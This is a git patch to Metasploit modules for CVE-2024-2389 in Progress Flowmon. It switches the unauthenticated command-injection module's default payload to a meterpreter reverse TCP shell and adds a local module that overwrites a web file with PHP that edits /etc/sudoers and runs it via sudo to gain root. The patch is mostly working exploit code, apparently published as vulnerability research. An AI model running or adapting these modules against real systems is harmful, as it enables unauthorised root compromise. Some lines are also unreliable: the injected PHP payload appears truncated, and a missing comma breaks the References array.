From 40548fa7cf0d28c40547a6e3b9834e16481b9f23 Mon Sep 17 00:00:00 2001 From: DaveYesland Date: Tue, 30 Apr 2024 14:30:34 -0700 Subject: [PATCH] Update msf modules --- .../progress_flowmon_unauth_cmd_injection.rb | 26 +------ .../local/progress_flowmon_sudo_privesc.rb | 78 +++++++++++++++++++ 2 files changed, 82 insertions(+), 22 deletions(-) rename CVE-2024-2389/metasploit/{ => exploits/linux/http}/progress_flowmon_unauth_cmd_injection.rb (72%) create mode 100644 CVE-2024-2389/metasploit/exploits/linux/local/progress_flowmon_sudo_privesc.rb diff --git a/CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb b/CVE-2024-2389/metasploit/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb similarity index 72% rename from CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb rename to CVE-2024-2389/metasploit/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb index 851b9fe..95eb8c3 100644 --- a/CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb +++ b/CVE-2024-2389/metasploit/exploits/linux/http/progress_flowmon_unauth_cmd_injection.rb @@ -26,19 +26,19 @@ def initialize(info = {}) ['CVE', 'CVE-2024-2389'], ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability'] ], - 'DisclosureDate' => '2024', + 'DisclosureDate' => '2024-04-23', 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK], 'Reliability' => [ REPEATABLE_SESSION ] }, 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_X86, ARCH_X64], + 'Arch' => [ARCH_CMD], 'Targets' => [['Automatic', {}]], 'Privileged' => false, 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/linux/https/x64/shell/reverse_tcp', + 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', 'SSL' => true, 'RPORT' => 443 }, @@ -46,8 +46,7 @@ def initialize(info = {}) ) register_options([ - OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/']), - OptBool.new('PRIVESC', [true, 'Automatically try privesc to add sudo entry', true]) + OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/']) ]) end @@ -68,23 +67,6 @@ def exploit execute_command(payload.encoded) end - def on_new_session(session) - if datastore['PRIVESC'] - execute_privesc_command(session) - else - print_status('Privilege escalation skipped.') - end - end - - def execute_privesc_command(session) - print_status("Executing privilege escalation command...") - session.shell_command('cp /var/www/shtml/index.php /tmp/index.php.bak;') - session.shell_command('echo \'> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;') - session.shell_command('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;') - session.shell_command('cp /tmp/index.php.bak /var/www/shtml/index.php;') - print_status('You should be able to use "sudo -i" for a root shell...') - end - def check print_status("Checking if #{peer} can be exploited!") diff --git a/CVE-2024-2389/metasploit/exploits/linux/local/progress_flowmon_sudo_privesc.rb b/CVE-2024-2389/metasploit/exploits/linux/local/progress_flowmon_sudo_privesc.rb new file mode 100644 index 0000000..fc41ab1 --- /dev/null +++ b/CVE-2024-2389/metasploit/exploits/linux/local/progress_flowmon_sudo_privesc.rb @@ -0,0 +1,78 @@ +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Post::File + + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Progress Flowmon Local sudo privilege escalation', + 'Description' => %q{ + This module abuses a feature of the sudo command on Progress Flowmon. + Certain binary files are allowed to automatically elevate + with the sudo command. This is based off of the file name. This + includes executing a PHP command with a specific file name. If the + file is overwritten with PHP code it can be used to elevate privileges + to root. + }, + 'Author' => [ + 'Dave Yesland with Rhino Security Labs', + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'] + ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability'] + ], + 'DisclosureDate' => '2024-03-19', + 'Notes' => { + 'Stability' => [ CRASH_SAFE ], + 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK], + 'Reliability' => [ REPEATABLE_SESSION ] + }, + 'SessionTypes' => ['shell', 'meterpreter'], + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => [['Automatic', {}]], + 'Privileged' => true, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' + } + ) + ) + end + + def check + score = 0 + score += 1 if read_file('/var/www/shtml/index.php').include?('FlowMon') + score += 1 if read_file('/var/www/shtml/ui/manifest.json').include?('Flowmon Web Interface') + score += 1 if exists?('/var/www/shtml/translate.php') + vprint_status("Found #{score} indicators this is a Progress Flowmon product") + return CheckCode::Detected if score > 0 + + return CheckCode::Safe + end + + def exploit + + begin + vprint_status('Copying /var/www/shtml/index.php to /tmp/index.php.bak') + cmd_exec('cp /var/www/shtml/index.php /tmp/index.php.bak') + vprint_status('Overwriting /var/www/shtml/index.php with payload') + cmd_exec('echo \'> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;') + vprint_status('Executing sudo to elevate privileges') + cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;') + vprint_status('Replacing index.php with original file') + cmd_exec('cp /tmp/index.php.bak /var/www/shtml/index.php') + vprint_status('You should be able to use "sudo -i" for a root shell...') + end + end + end \ No newline at end of file